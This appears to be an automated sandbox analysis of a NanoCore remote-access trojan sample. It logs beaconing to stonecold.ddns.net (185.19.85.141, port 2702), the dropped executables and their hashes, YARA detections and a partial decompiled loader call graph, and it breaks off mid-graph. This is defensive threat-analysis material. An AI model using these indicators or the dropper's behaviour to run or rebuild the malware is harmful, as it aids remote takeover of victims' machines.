                                                        May 17, 2022 12:14:39.408662081 CEST270249776185.19.85.141192.168.2.3
                                                        May 17, 2022 12:14:39.410801888 CEST497762702192.168.2.3185.19.85.141
                                                        May 17, 2022 12:14:39.512757063 CEST270249776185.19.85.141192.168.2.3
                                                        May 17, 2022 12:14:39.567863941 CEST497762702192.168.2.3185.19.85.141
                                                        May 17, 2022 12:14:39.592813015 CEST270249776185.19.85.141192.168.2.3
                                                        May 17, 2022 12:14:39.592989922 CEST497762702192.168.2.3185.19.85.141
                                                        May 17, 2022 12:14:39.602665901 CEST497762702192.168.2.3185.19.85.141
                                                        May 17, 2022 12:14:43.676788092 CEST497772702192.168.2.3185.19.85.141
                                                        May 17, 2022 12:14:43.862670898 CEST270249777185.19.85.141192.168.2.3
                                                        May 17, 2022 12:14:43.865611076 CEST497772702192.168.2.3185.19.85.141
                                                        May 17, 2022 12:14:43.866226912 CEST497772702192.168.2.3185.19.85.141
                                                        May 17, 2022 12:14:44.106393099 CEST270249777185.19.85.141192.168.2.3
                                                        May 17, 2022 12:14:44.106559992 CEST497772702192.168.2.3185.19.85.141
                                                        May 17, 2022 12:14:44.153368950 CEST270249777185.19.85.141192.168.2.3
                                                        May 17, 2022 12:14:44.153495073 CEST497772702192.168.2.3185.19.85.141
                                                        May 17, 2022 12:14:44.338848114 CEST270249777185.19.85.141192.168.2.3
                                                        May 17, 2022 12:14:44.340656996 CEST497772702192.168.2.3185.19.85.141
                                                        May 17, 2022 12:14:44.387579918 CEST270249777185.19.85.141192.168.2.3
                                                        May 17, 2022 12:14:44.387722015 CEST497772702192.168.2.3185.19.85.141
                                                        May 17, 2022 12:14:44.531961918 CEST270249777185.19.85.141192.168.2.3
                                                        May 17, 2022 12:14:44.532115936 CEST497772702192.168.2.3185.19.85.141
                                                        May 17, 2022 12:14:44.634577036 CEST270249777185.19.85.141192.168.2.3
                                                        May 17, 2022 12:14:44.634694099 CEST497772702192.168.2.3185.19.85.141
                                                        May 17, 2022 12:14:44.772831917 CEST270249777185.19.85.141192.168.2.3
                                                        May 17, 2022 12:14:44.772947073 CEST497772702192.168.2.3185.19.85.141
                                                        May 17, 2022 12:14:44.872615099 CEST270249777185.19.85.141192.168.2.3
                                                        May 17, 2022 12:14:45.012612104 CEST270249777185.19.85.141192.168.2.3
                                                        May 17, 2022 12:14:45.012691975 CEST497772702192.168.2.3185.19.85.141
                                                        May 17, 2022 12:14:45.254138947 CEST270249777185.19.85.141192.168.2.3
                                                        May 17, 2022 12:14:45.382581949 CEST270249777185.19.85.141192.168.2.3
                                                        May 17, 2022 12:14:45.382956982 CEST497772702192.168.2.3185.19.85.141
                                                        May 17, 2022 12:14:45.572696924 CEST270249777185.19.85.141192.168.2.3
                                                        May 17, 2022 12:14:45.574219942 CEST497772702192.168.2.3185.19.85.141
                                                        May 17, 2022 12:14:45.767270088 CEST270249777185.19.85.141192.168.2.3
                                                        May 17, 2022 12:14:45.767412901 CEST497772702192.168.2.3185.19.85.141
                                                        May 17, 2022 12:14:45.952728033 CEST270249777185.19.85.141192.168.2.3
                                                        May 17, 2022 12:14:45.993772984 CEST497772702192.168.2.3185.19.85.141
                                                        May 17, 2022 12:14:49.052825928 CEST270249777185.19.85.141192.168.2.3
                                                        May 17, 2022 12:14:49.103220940 CEST497772702192.168.2.3185.19.85.141
                                                        May 17, 2022 12:14:51.202811003 CEST270249777185.19.85.141192.168.2.3
                                                        May 17, 2022 12:14:51.415828943 CEST497772702192.168.2.3185.19.85.141
                                                        May 17, 2022 12:14:51.565047026 CEST270249777185.19.85.141192.168.2.3
                                                        May 17, 2022 12:14:51.565119028 CEST497772702192.168.2.3185.19.85.141
                                                        TimestampSource PortDest PortSource IPDest IP
                                                        May 17, 2022 12:12:58.920829058 CEST5592353192.168.2.38.8.8.8
                                                        May 17, 2022 12:12:58.941987991 CEST53559238.8.8.8192.168.2.3
                                                        May 17, 2022 12:13:05.952495098 CEST5742153192.168.2.38.8.8.8
                                                        May 17, 2022 12:13:05.972088099 CEST53574218.8.8.8192.168.2.3
                                                        May 17, 2022 12:13:12.585015059 CEST4987353192.168.2.38.8.8.8
                                                        May 17, 2022 12:13:12.606115103 CEST53498738.8.8.8192.168.2.3
                                                        May 17, 2022 12:13:21.464219093 CEST6333253192.168.2.38.8.8.8
                                                        May 17, 2022 12:13:21.485625029 CEST53633328.8.8.8192.168.2.3
                                                        May 17, 2022 12:13:27.944885969 CEST6354853192.168.2.38.8.8.8
                                                        May 17, 2022 12:13:27.973401070 CEST53635488.8.8.8192.168.2.3
                                                        May 17, 2022 12:13:34.360271931 CEST4932753192.168.2.38.8.8.8
                                                        May 17, 2022 12:13:34.379478931 CEST53493278.8.8.8192.168.2.3
                                                        May 17, 2022 12:13:41.841485023 CEST5139153192.168.2.38.8.8.8
                                                        May 17, 2022 12:13:41.861246109 CEST53513918.8.8.8192.168.2.3
                                                        May 17, 2022 12:13:48.083240986 CEST5898153192.168.2.38.8.8.8
                                                        May 17, 2022 12:13:48.100805998 CEST53589818.8.8.8192.168.2.3
                                                        May 17, 2022 12:13:55.711556911 CEST6445253192.168.2.38.8.8.8
                                                        May 17, 2022 12:13:55.730863094 CEST53644528.8.8.8192.168.2.3
                                                        May 17, 2022 12:14:01.968539000 CEST6138053192.168.2.38.8.8.8
                                                        May 17, 2022 12:14:01.985424995 CEST53613808.8.8.8192.168.2.3
                                                        May 17, 2022 12:14:08.614901066 CEST5298553192.168.2.38.8.8.8
                                                        May 17, 2022 12:14:08.635724068 CEST53529858.8.8.8192.168.2.3
                                                        May 17, 2022 12:14:15.501707077 CEST5862553192.168.2.38.8.8.8
                                                        May 17, 2022 12:14:15.521434069 CEST53586258.8.8.8192.168.2.3
                                                        May 17, 2022 12:14:22.052812099 CEST5281053192.168.2.38.8.8.8
                                                        May 17, 2022 12:14:22.072029114 CEST53528108.8.8.8192.168.2.3
                                                        May 17, 2022 12:14:28.560749054 CEST5515153192.168.2.38.8.8.8
                                                        May 17, 2022 12:14:28.580450058 CEST53551518.8.8.8192.168.2.3
                                                        May 17, 2022 12:14:37.462311983 CEST5979553192.168.2.38.8.8.8
                                                        May 17, 2022 12:14:37.489656925 CEST53597958.8.8.8192.168.2.3
                                                        May 17, 2022 12:14:43.654771090 CEST5939053192.168.2.38.8.8.8
                                                        May 17, 2022 12:14:43.675661087 CEST53593908.8.8.8192.168.2.3
                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                        May 17, 2022 12:12:58.920829058 CEST192.168.2.38.8.8.80x82bdStandard query (0)stonecold.ddns.netA (IP address)IN (0x0001)
                                                        May 17, 2022 12:13:05.952495098 CEST192.168.2.38.8.8.80x5bf2Standard query (0)stonecold.ddns.netA (IP address)IN (0x0001)
                                                        May 17, 2022 12:13:12.585015059 CEST192.168.2.38.8.8.80x9918Standard query (0)stonecold.ddns.netA (IP address)IN (0x0001)
                                                        May 17, 2022 12:13:21.464219093 CEST192.168.2.38.8.8.80xbe9bStandard query (0)stonecold.ddns.netA (IP address)IN (0x0001)
                                                        May 17, 2022 12:13:27.944885969 CEST192.168.2.38.8.8.80x8ee9Standard query (0)stonecold.ddns.netA (IP address)IN (0x0001)
                                                        May 17, 2022 12:13:34.360271931 CEST192.168.2.38.8.8.80xa42dStandard query (0)stonecold.ddns.netA (IP address)IN (0x0001)
                                                        May 17, 2022 12:13:41.841485023 CEST192.168.2.38.8.8.80xd02dStandard query (0)stonecold.ddns.netA (IP address)IN (0x0001)
                                                        May 17, 2022 12:13:48.083240986 CEST192.168.2.38.8.8.80xe84bStandard query (0)stonecold.ddns.netA (IP address)IN (0x0001)
                                                        May 17, 2022 12:13:55.711556911 CEST192.168.2.38.8.8.80xf82bStandard query (0)stonecold.ddns.netA (IP address)IN (0x0001)
                                                        May 17, 2022 12:14:01.968539000 CEST192.168.2.38.8.8.80x845Standard query (0)stonecold.ddns.netA (IP address)IN (0x0001)
                                                        May 17, 2022 12:14:08.614901066 CEST192.168.2.38.8.8.80xfe12Standard query (0)stonecold.ddns.netA (IP address)IN (0x0001)
                                                        May 17, 2022 12:14:15.501707077 CEST192.168.2.38.8.8.80xfeeeStandard query (0)stonecold.ddns.netA (IP address)IN (0x0001)
                                                        May 17, 2022 12:14:22.052812099 CEST192.168.2.38.8.8.80x5836Standard query (0)stonecold.ddns.netA (IP address)IN (0x0001)
                                                        May 17, 2022 12:14:28.560749054 CEST192.168.2.38.8.8.80xf6bStandard query (0)stonecold.ddns.netA (IP address)IN (0x0001)
                                                        May 17, 2022 12:14:37.462311983 CEST192.168.2.38.8.8.80xdcc2Standard query (0)stonecold.ddns.netA (IP address)IN (0x0001)
                                                        May 17, 2022 12:14:43.654771090 CEST192.168.2.38.8.8.80x3888Standard query (0)stonecold.ddns.netA (IP address)IN (0x0001)
                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                        May 17, 2022 12:12:58.941987991 CEST8.8.8.8192.168.2.30x82bdNo error (0)stonecold.ddns.net185.19.85.141A (IP address)IN (0x0001)
                                                        May 17, 2022 12:13:05.972088099 CEST8.8.8.8192.168.2.30x5bf2No error (0)stonecold.ddns.net185.19.85.141A (IP address)IN (0x0001)
                                                        May 17, 2022 12:13:12.606115103 CEST8.8.8.8192.168.2.30x9918No error (0)stonecold.ddns.net185.19.85.141A (IP address)IN (0x0001)
                                                        May 17, 2022 12:13:21.485625029 CEST8.8.8.8192.168.2.30xbe9bNo error (0)stonecold.ddns.net185.19.85.141A (IP address)IN (0x0001)
                                                        May 17, 2022 12:13:27.973401070 CEST8.8.8.8192.168.2.30x8ee9No error (0)stonecold.ddns.net185.19.85.141A (IP address)IN (0x0001)
                                                        May 17, 2022 12:13:34.379478931 CEST8.8.8.8192.168.2.30xa42dNo error (0)stonecold.ddns.net185.19.85.141A (IP address)IN (0x0001)
                                                        May 17, 2022 12:13:41.861246109 CEST8.8.8.8192.168.2.30xd02dNo error (0)stonecold.ddns.net185.19.85.141A (IP address)IN (0x0001)
                                                        May 17, 2022 12:13:48.100805998 CEST8.8.8.8192.168.2.30xe84bNo error (0)stonecold.ddns.net185.19.85.141A (IP address)IN (0x0001)
                                                        May 17, 2022 12:13:55.730863094 CEST8.8.8.8192.168.2.30xf82bNo error (0)stonecold.ddns.net185.19.85.141A (IP address)IN (0x0001)
                                                        May 17, 2022 12:14:01.985424995 CEST8.8.8.8192.168.2.30x845No error (0)stonecold.ddns.net185.19.85.141A (IP address)IN (0x0001)
                                                        May 17, 2022 12:14:08.635724068 CEST8.8.8.8192.168.2.30xfe12No error (0)stonecold.ddns.net185.19.85.141A (IP address)IN (0x0001)
                                                        May 17, 2022 12:14:15.521434069 CEST8.8.8.8192.168.2.30xfeeeNo error (0)stonecold.ddns.net185.19.85.141A (IP address)IN (0x0001)
                                                        May 17, 2022 12:14:22.072029114 CEST8.8.8.8192.168.2.30x5836No error (0)stonecold.ddns.net185.19.85.141A (IP address)IN (0x0001)
                                                        May 17, 2022 12:14:28.580450058 CEST8.8.8.8192.168.2.30xf6bNo error (0)stonecold.ddns.net185.19.85.141A (IP address)IN (0x0001)
                                                        May 17, 2022 12:14:37.489656925 CEST8.8.8.8192.168.2.30xdcc2No error (0)stonecold.ddns.net185.19.85.141A (IP address)IN (0x0001)
                                                        May 17, 2022 12:14:43.675661087 CEST8.8.8.8192.168.2.30x3888No error (0)stonecold.ddns.net185.19.85.141A (IP address)IN (0x0001)

                                                        Click to jump to process

                                                        Click to jump to process

                                                        Click to dive into process behavior distribution

                                                        Click to jump to process

                                                        Target ID:0
                                                        Start time:12:12:40
                                                        Start date:17/05/2022
                                                        Path:C:\Users\user\Desktop\xeWd55M5Lb.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Users\user\Desktop\xeWd55M5Lb.exe"
                                                        Imagebase:0x400000
                                                        File size:328454 bytes
                                                        MD5 hash:F32D1F6E94DA654932E73E42F0F4773A
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:low

                                                        Target ID:1
                                                        Start time:12:12:41
                                                        Start date:17/05/2022
                                                        Path:C:\Users\user\AppData\Local\Temp\jqenyeo.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:C:\Users\user\AppData\Local\Temp\jqenyeo.exe C:\Users\user\AppData\Local\Temp\hjmxlwxk
                                                        Imagebase:0x400000
                                                        File size:75776 bytes
                                                        MD5 hash:22A5EC1E72CE0D23B1598C40639BB3B2
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000001.00000002.290429738.00000000021B0000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth
                                                        • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000001.00000002.290429738.00000000021B0000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth
                                                        • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000001.00000002.290429738.00000000021B0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: MALWARE_Win_NanoCore, Description: Detects NanoCore, Source: 00000001.00000002.290429738.00000000021B0000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                        • Rule: NanoCore, Description: unknown, Source: 00000001.00000002.290429738.00000000021B0000.00000004.00001000.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                        Antivirus matches:
                                                        • Detection: 23%, ReversingLabs
                                                        Reputation:low

                                                        Target ID:2
                                                        Start time:12:12:42
                                                        Start date:17/05/2022
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff7c9170000
                                                        File size:625664 bytes
                                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high

                                                        Target ID:3
                                                        Start time:12:12:43
                                                        Start date:17/05/2022
                                                        Path:C:\Users\user\AppData\Local\Temp\jqenyeo.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:C:\Users\user\AppData\Local\Temp\jqenyeo.exe C:\Users\user\AppData\Local\Temp\hjmxlwxk
                                                        Imagebase:0x400000
                                                        File size:75776 bytes
                                                        MD5 hash:22A5EC1E72CE0D23B1598C40639BB3B2
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:.Net C# or VB.NET
                                                        Yara matches:
                                                        • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000003.00000000.285051410.0000000000414000.00000040.00000400.00020000.00000000.sdmp, Author: Florian Roth
                                                        • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000003.00000000.285051410.0000000000414000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: NanoCore, Description: unknown, Source: 00000003.00000000.285051410.0000000000414000.00000040.00000400.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                        • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000003.00000000.287818975.0000000000414000.00000040.00000400.00020000.00000000.sdmp, Author: Florian Roth
                                                        • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000003.00000000.287818975.0000000000414000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: NanoCore, Description: unknown, Source: 00000003.00000000.287818975.0000000000414000.00000040.00000400.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                        Reputation:low

                                                        Target ID:6
                                                        Start time:12:12:56
                                                        Start date:17/05/2022
                                                        Path:C:\Users\user\AppData\Roaming\mtmgxghqo\ltqmdmdi.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Users\user\AppData\Roaming\mtmgxghqo\ltqmdmdi.exe"
                                                        Imagebase:0x400000
                                                        File size:75776 bytes
                                                        MD5 hash:22A5EC1E72CE0D23B1598C40639BB3B2
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Antivirus matches:
                                                        • Detection: 23%, ReversingLabs
                                                        Reputation:low

                                                        Target ID:8
                                                        Start time:12:12:58
                                                        Start date:17/05/2022
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff7c9170000
                                                        File size:625664 bytes
                                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high

                                                        Target ID:14
                                                        Start time:12:13:01
                                                        Start date:17/05/2022
                                                        Path:C:\Windows\SysWOW64\WerFault.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 6696 -s 628
                                                        Imagebase:0x990000
                                                        File size:434592 bytes
                                                        MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high

                                                        Target ID:17
                                                        Start time:12:13:06
                                                        Start date:17/05/2022
                                                        Path:C:\Users\user\AppData\Roaming\mtmgxghqo\ltqmdmdi.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Users\user\AppData\Roaming\mtmgxghqo\ltqmdmdi.exe"
                                                        Imagebase:0x400000
                                                        File size:75776 bytes
                                                        MD5 hash:22A5EC1E72CE0D23B1598C40639BB3B2
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Reputation:low

                                                        Target ID:19
                                                        Start time:12:13:07
                                                        Start date:17/05/2022
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff7c9170000
                                                        File size:625664 bytes
                                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high

                                                        Target ID:21
                                                        Start time:12:13:09
                                                        Start date:17/05/2022
                                                        Path:C:\Windows\SysWOW64\WerFault.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 5948 -s 608
                                                        Imagebase:0x990000
                                                        File size:434592 bytes
                                                        MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language

                                                        Reset < >

                                                          Execution Graph

                                                          Execution Coverage:15.9%
                                                          Dynamic/Decrypted Code Coverage:0%
                                                          Signature Coverage:16.4%
                                                          Total number of Nodes:1385
                                                          Total number of Limit Nodes:25
                                                          execution_graph 3223 403640 SetErrorMode GetVersionExW 3224 403692 GetVersionExW 3223->3224 3225 4036ca 3223->3225 3224->3225 3226 403723 3225->3226 3227 406a35 5 API calls 3225->3227 3313 4069c5 GetSystemDirectoryW 3226->3313 3227->3226 3229 403739 lstrlenA 3229->3226 3230 403749 3229->3230 3316 406a35 GetModuleHandleA 3230->3316 3233 406a35 5 API calls 3234 403757 3233->3234 3235 406a35 5 API calls 3234->3235 3236 403763 #17 OleInitialize SHGetFileInfoW 3235->3236 3322 406668 lstrcpynW 3236->3322 3239 4037b0 GetCommandLineW 3323 406668 lstrcpynW 3239->3323 3241 4037c2 3324 405f64 3241->3324 3244 4038f7 3245 40390b GetTempPathW 3244->3245 3328 40360f 3245->3328 3247 403923 3249 403927 GetWindowsDirectoryW lstrcatW 3247->3249 3250 40397d DeleteFileW 3247->3250 3248 405f64 CharNextW 3252 4037f9 3248->3252 3253 40360f 12 API calls 3249->3253 3338 4030d0 GetTickCount GetModuleFileNameW 3250->3338 3252->3244 3252->3248 3257 4038f9 3252->3257 3255 403943 3253->3255 3254 403990 3258 403b6c ExitProcess OleUninitialize 3254->3258 3260 403a45 3254->3260 3267 405f64 CharNextW 3254->3267 3255->3250 3256 403947 GetTempPathW lstrcatW SetEnvironmentVariableW SetEnvironmentVariableW 3255->3256 3259 40360f 12 API calls 3256->3259 3424 406668 lstrcpynW 3257->3424 3262 403b91 3258->3262 3263 403b7c 3258->3263 3266 403975 3259->3266 3368 403d17 3260->3368 3264 403b99 GetCurrentProcess OpenProcessToken 3262->3264 3265 403c0f ExitProcess 3262->3265 3478 405cc8 3263->3478 3270 403bb0 LookupPrivilegeValueW AdjustTokenPrivileges 3264->3270 3271 403bdf 3264->3271 3266->3250 3266->3258 3282 4039b2 3267->3282 3270->3271 3275 406a35 5 API calls 3271->3275 3272 403a54 3272->3258 3278 403be6 3275->3278 3276 403a1b 3425 40603f 3276->3425 3277 403a5c 3441 405c33 3277->3441 3280 403bfb ExitWindowsEx 3278->3280 3284 403c08 3278->3284 3280->3265 3280->3284 3282->3276 3282->3277 3482 40140b 3284->3482 3287 403a72 lstrcatW 3288 403a7d lstrcatW lstrcmpiW 3287->3288 3288->3272 3289 403a9d 3288->3289 3291 403aa2 3289->3291 3292 403aa9 3289->3292 3444 405b99 CreateDirectoryW 3291->3444 3449 405c16 CreateDirectoryW 3292->3449 3293 403a3a 3440 406668 lstrcpynW 3293->3440 3298 403aae SetCurrentDirectoryW 3299 403ac0 3298->3299 3300 403acb 3298->3300 3452 406668 lstrcpynW 3299->3452 3453 406668 lstrcpynW 3300->3453 3305 403b19 CopyFileW 3309 403ad8 3305->3309 3306 403b63 3308 406428 36 API calls 3306->3308 3308->3272 3309->3306 3310 4066a5 17 API calls 3309->3310 3312 403b4d CloseHandle 3309->3312 3454 4066a5 3309->3454 3471 406428 MoveFileExW 3309->3471 3475 405c4b CreateProcessW 3309->3475 3310->3309 3312->3309 3314 4069e7 wsprintfW LoadLibraryExW 3313->3314 3314->3229 3317 406a51 3316->3317 3318 406a5b GetProcAddress 3316->3318 3319 4069c5 3 API calls 3317->3319 3320 403750 3318->3320 3321 406a57 3319->3321 3320->3233 3321->3318 3321->3320 3322->3239 3323->3241 3325 405f6a 3324->3325 3326 4037e8 CharNextW 3325->3326 3327 405f71 CharNextW 3325->3327 3326->3252 3327->3325 3485 4068ef 3328->3485 3330 403625 3330->3247 3331 40361b 3331->3330 3494 405f37 lstrlenW CharPrevW 3331->3494 3334 405c16 2 API calls 3335 403633 3334->3335 3497 406187 3335->3497 3501 406158 GetFileAttributesW CreateFileW 3338->3501 3340 403113 3367 403120 3340->3367 3502 406668 lstrcpynW 3340->3502 3342 403136 3503 405f83 lstrlenW 3342->3503 3346 403147 GetFileSize 3347 403241 3346->3347 3366 40315e 3346->3366 3508 40302e 3347->3508 3351 403286 GlobalAlloc 3354 40329d 3351->3354 3353 4032de 3356 40302e 32 API calls 3353->3356 3358 406187 2 API calls 3354->3358 3355 403267 3357 4035e2 ReadFile 3355->3357 3356->3367 3359 403272 3357->3359 3361 4032ae CreateFileW 3358->3361 3359->3351 3359->3367 3360 40302e 32 API calls 3360->3366 3362 4032e8 3361->3362 3361->3367 3523 4035f8 SetFilePointer 3362->3523 3364 4032f6 3524 403371 3364->3524 3366->3347 3366->3353 3366->3360 3366->3367 3539 4035e2 3366->3539 3367->3254 3369 406a35 5 API calls 3368->3369 3370 403d2b 3369->3370 3371 403d31 GetUserDefaultUILanguage 3370->3371 3372 403d43 3370->3372 3586 4065af wsprintfW 3371->3586 3595 406536 3372->3595 3375 403d41 3587 403fed 3375->3587 3377 403d92 lstrcatW 3377->3375 3378 406536 3 API calls 3378->3377 3381 40603f 18 API calls 3382 403dc4 3381->3382 3383 403e58 3382->3383 3386 406536 3 API calls 3382->3386 3384 40603f 18 API calls 3383->3384 3385 403e5e 3384->3385 3387 403e6e LoadImageW 3385->3387 3388 4066a5 17 API calls 3385->3388 3392 403df6 3386->3392 3389 403f14 3387->3389 3390 403e95 RegisterClassW 3387->3390 3388->3387 3394 40140b 2 API calls 3389->3394 3393 403ecb SystemParametersInfoW CreateWindowExW 3390->3393 3423 403f1e 3390->3423 3391 403e17 lstrlenW 3396 403e25 lstrcmpiW 3391->3396 3397 403e4b 3391->3397 3392->3383 3392->3391 3395 405f64 CharNextW 3392->3395 3393->3389 3398 403f1a 3394->3398 3399 403e14 3395->3399 3396->3397 3400 403e35 GetFileAttributesW 3396->3400 3401 405f37 3 API calls 3397->3401 3403 403fed 18 API calls 3398->3403 3398->3423 3399->3391 3402 403e41 3400->3402 3404 403e51 3401->3404 3402->3397 3405 405f83 2 API calls 3402->3405 3406 403f2b 3403->3406 3600 406668 lstrcpynW 3404->3600 3405->3397 3408 403f37 ShowWindow 3406->3408 3409 403fba 3406->3409 3411 4069c5 3 API calls 3408->3411 3601 40579d OleInitialize 3409->3601 3413 403f4f 3411->3413 3412 403fc0 3415 403fc4 3412->3415 3416 403fdc 3412->3416 3414 403f5d GetClassInfoW 3413->3414 3417 4069c5 3 API calls 3413->3417 3419 403f71 GetClassInfoW RegisterClassW 3414->3419 3420 403f87 DialogBoxParamW 3414->3420 3422 40140b 2 API calls 3415->3422 3415->3423 3418 40140b 2 API calls 3416->3418 3417->3414 3418->3423 3419->3420 3421 40140b 2 API calls 3420->3421 3421->3423 3422->3423 3423->3272 3424->3245 3623 406668 lstrcpynW 3425->3623 3427 406050 3624 405fe2 CharNextW CharNextW 3427->3624 3430 403a27 3430->3258 3439 406668 lstrcpynW 3430->3439 3431 4068ef 5 API calls 3437 406066 3431->3437 3432 406097 lstrlenW 3433 4060a2 3432->3433 3432->3437 3434 405f37 3 API calls 3433->3434 3436 4060a7 GetFileAttributesW 3434->3436 3436->3430 3437->3430 3437->3432 3438 405f83 2 API calls 3437->3438 3630 40699e FindFirstFileW 3437->3630 3438->3432 3439->3293 3440->3260 3442 406a35 5 API calls 3441->3442 3443 403a61 lstrcatW 3442->3443 3443->3287 3443->3288 3445 403aa7 3444->3445 3446 405bea GetLastError 3444->3446 3445->3298 3446->3445 3447 405bf9 SetFileSecurityW 3446->3447 3447->3445 3448 405c0f GetLastError 3447->3448 3448->3445 3450 405c2a GetLastError 3449->3450 3451 405c26 3449->3451 3450->3451 3451->3298 3452->3300 3453->3309 3458 4066b2 3454->3458 3455 4068d5 3456 403b0d DeleteFileW 3455->3456 3635 406668 lstrcpynW 3455->3635 3456->3305 3456->3309 3458->3455 3459 4068a3 lstrlenW 3458->3459 3460 4067ba GetSystemDirectoryW 3458->3460 3463 406536 3 API calls 3458->3463 3464 4066a5 10 API calls 3458->3464 3465 4067cd GetWindowsDirectoryW 3458->3465 3466 4068ef 5 API calls 3458->3466 3467 4067fc SHGetSpecialFolderLocation 3458->3467 3468 406844 lstrcatW 3458->3468 3469 4066a5 10 API calls 3458->3469 3633 4065af wsprintfW 3458->3633 3634 406668 lstrcpynW 3458->3634 3459->3458 3460->3458 3463->3458 3464->3459 3465->3458 3466->3458 3467->3458 3470 406814 SHGetPathFromIDListW CoTaskMemFree 3467->3470 3468->3458 3469->3458 3470->3458 3472 406449 3471->3472 3473 40643c 3471->3473 3472->3309 3636 4062ae 3473->3636 3476 405c8a 3475->3476 3477 405c7e CloseHandle 3475->3477 3476->3309 3477->3476 3481 405cdd 3478->3481 3479 403b89 ExitProcess 3480 405cf1 MessageBoxIndirectW 3480->3479 3481->3479 3481->3480 3483 401389 2 API calls 3482->3483 3484 401420 3483->3484 3484->3265 3486 4068fc 3485->3486 3488 406972 3486->3488 3489 406965 CharNextW 3486->3489 3491 405f64 CharNextW 3486->3491 3492 406951 CharNextW 3486->3492 3493 406960 CharNextW 3486->3493 3487 406977 CharPrevW 3487->3488 3488->3487 3490 406998 3488->3490 3489->3486 3489->3488 3490->3331 3491->3486 3492->3486 3493->3489 3495 405f53 lstrcatW 3494->3495 3496 40362d 3494->3496 3495->3496 3496->3334 3498 406194 GetTickCount GetTempFileNameW 3497->3498 3499 40363e 3498->3499 3500 4061ca 3498->3500 3499->3247 3500->3498 3500->3499 3501->3340 3502->3342 3504 405f91 3503->3504 3505 40313c 3504->3505 3506 405f97 CharPrevW 3504->3506 3507 406668 lstrcpynW 3505->3507 3506->3504 3506->3505 3507->3346 3509 403057 3508->3509 3510 40303f 3508->3510 3511 403067 GetTickCount 3509->3511 3512 40305f 3509->3512 3513 403048 DestroyWindow 3510->3513 3514 40304f 3510->3514 3511->3514 3516 403075 3511->3516 3543 406a71 3512->3543 3513->3514 3514->3351 3514->3367 3542 4035f8 SetFilePointer 3514->3542 3517 4030aa CreateDialogParamW ShowWindow 3516->3517 3518 40307d 3516->3518 3517->3514 3518->3514 3547 403012 3518->3547 3520 40308b wsprintfW 3550 4056ca 3520->3550 3523->3364 3525 403380 SetFilePointer 3524->3525 3526 40339c 3524->3526 3525->3526 3561 403479 GetTickCount 3526->3561 3531 403479 42 API calls 3532 4033d3 3531->3532 3533 40343f ReadFile 3532->3533 3537 4033e2 3532->3537 3538 403439 3532->3538 3533->3538 3535 4061db ReadFile 3535->3537 3537->3535 3537->3538 3576 40620a WriteFile 3537->3576 3538->3367 3540 4061db ReadFile 3539->3540 3541 4035f5 3540->3541 3541->3366 3542->3355 3544 406a8e PeekMessageW 3543->3544 3545 406a84 DispatchMessageW 3544->3545 3546 406a9e 3544->3546 3545->3544 3546->3514 3548 403021 3547->3548 3549 403023 MulDiv 3547->3549 3548->3549 3549->3520 3551 4056e5 3550->3551 3552 